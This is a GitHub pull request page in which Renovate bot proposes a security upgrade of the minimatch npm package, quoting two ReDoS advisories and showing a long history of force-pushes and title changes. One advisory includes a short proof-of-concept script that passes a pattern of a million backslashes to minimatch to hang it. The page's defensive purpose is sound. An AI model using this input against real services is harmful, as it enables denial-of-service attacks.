Update dependency minimatch to v3 [SECURITY]#4

Open

renovate[bot] wants to merge 1 commit intomasterfrom

renovate/npm-minimatch-vulnerability

Contributor

renovate bot commented Jan 9, 2025 •

edited

Loading

This PR contains the following updates:

Package	Change	Age	Confidence
minimatch	`~0.2.8` → `~3.0.5`

GitHub Vulnerability Alerts

CVE-2016-10540

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

CVE-2022-3517

A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.

Release Notes

isaacs/minimatch (minimatch)

`v3.0.5`

`v3.0.4`

`v3.0.3`

`v3.0.2`

`v3.0.0`

`v2.0.10`

`v2.0.9`

`v2.0.8`

`v2.0.7`

`v2.0.6`

`v2.0.5`

`v2.0.4`

`v2.0.3`

`v2.0.2`

`v2.0.1`

`v2.0.0`

`v1.0.0`

`v0.4.0`

`v0.3.0`

`v0.2.14`

`v0.2.13`

`v0.2.12`

`v0.2.11`

`v0.2.10`

`v0.2.9`

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 25f2102 to 73f6644 Compare

January 11, 2025 11:49

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 73f6644 to af92458 Compare

January 15, 2025 19:39

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from af92458 to 7cee331 Compare

January 17, 2025 11:45

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 7cee331 to 9ce7662 Compare

January 25, 2025 11:49

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 9ce7662 to f56c2b6 Compare

January 26, 2025 06:13

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from f56c2b6 to 4fc646c Compare

January 31, 2025 19:07

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 4fc646c to 9c99dbb Compare

February 1, 2025 19:46

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 9c99dbb to be5062a Compare

February 9, 2025 11:30

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from be5062a to 4dd9357 Compare

February 12, 2025 07:54

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 4dd9357 to e1abe6a Compare

March 5, 2025 03:43

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from e1abe6a to 6e7c29e Compare

March 8, 2025 03:32

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch 2 times, most recently from cf97bf3 to 46a222f Compare

March 15, 2025 11:18

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 46a222f to 44cea12 Compare

March 19, 2025 23:58

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 44cea12 to 273a21a Compare

March 21, 2025 23:49

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 9844bf2 to 0bdcf18 Compare

December 5, 2025 07:43

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 0bdcf18 to 2421245 Compare

December 6, 2025 11:05

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 2421245 to 1519d45 Compare

December 30, 2025 11:46

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 1519d45 to ce08527 Compare

January 2, 2026 07:39

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from ce08527 to f469ec4 Compare

January 10, 2026 07:27

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from f469ec4 to 6dea217 Compare

January 11, 2026 04:03

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 6dea217 to a2afe98 Compare

January 20, 2026 04:14

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from a2afe98 to ffca765 Compare

January 21, 2026 11:56

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from ffca765 to 464136d Compare

February 3, 2026 11:49

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 464136d to 72aa456 Compare

February 5, 2026 00:02

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 72aa456 to d799d67 Compare

February 13, 2026 11:56

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from d799d67 to 4e13177 Compare

February 14, 2026 06:58

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from 4e13177 to b29f17f Compare

February 17, 2026 07:02

renovate bot changed the title ~~Update dependency minimatch to v3 [SECURITY]~~ Update dependency minimatch to ~0.4.0 [SECURITY]


          Update dependency minimatch to v3 [SECURITY]

2d62f87

renovate bot force-pushed the renovate/npm-minimatch-vulnerability branch from b29f17f to 2d62f87 Compare

February 20, 2026 12:10

renovate bot changed the title ~~Update dependency minimatch to ~0.4.0 [SECURITY]~~ Update dependency minimatch to v3 [SECURITY]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet